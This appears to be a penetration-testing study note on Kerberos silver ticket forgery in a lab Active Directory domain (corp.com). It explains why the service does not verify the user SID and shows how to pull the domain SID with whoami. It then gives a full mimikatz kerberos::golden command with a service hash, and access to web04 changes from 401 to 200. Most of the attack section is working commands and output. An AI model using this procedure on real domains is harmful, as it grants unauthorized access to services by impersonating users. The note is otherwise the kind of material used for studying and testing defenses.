Silver Ticket Forgery

This attack requires to have the hash or cleartext password of a service account

Theory

In this attack we forge a TGS and use it to get unrestricted access to a SPN.

The reason we can do this is because the user SID in the TGS isn't verifed by the SPN when decrypting the TGS (since only the DC and the SPN are supposed to be able to decrypt the TGS).

This means only the permissions will be checked in the TGS.

Theory Recap

We create a TGS with full permissions and encrypt it using the SPN hash
We send it to the SPN and gain full access to the service

Attack

Prepare

We need to collect the following to forge the ticket:

The SPN password hash (let's assume we already have it)
The domain SID
The target SPN (let's assume it's HTTP/web04.corp.com)

To get the domain SID we get our SID and remove the RID at the end:

> whoami /user

USER INFORMATION
----------------

User Name SID
========= =============================================
corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105

Domain SID is S-1-5-21-1987370270-658905905-1781884369

Forge TGS

When we attempt to access the SPN (the webserver) we cannot:

PS C:\Users\jeff> iwr -UseDefaultCredentials http://web04
iwr :
401 - Unauthorized: Access is denied due to invalid credentials.
Server Error

We will forge a TGS using mimkatz:

mimikatz.exe
> kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin

Hash goes in /rc4:

Now we have a full permission TGS for the SPN. We can verify:

klist

When we try to access the webserver again:

PS C:\Tools> iwr -UseDefaultCredentials http://web04

StatusCode        : 200

PreviousKerberoasting NextDomain Controllers Synchronization Attack

Last updated 2 years ago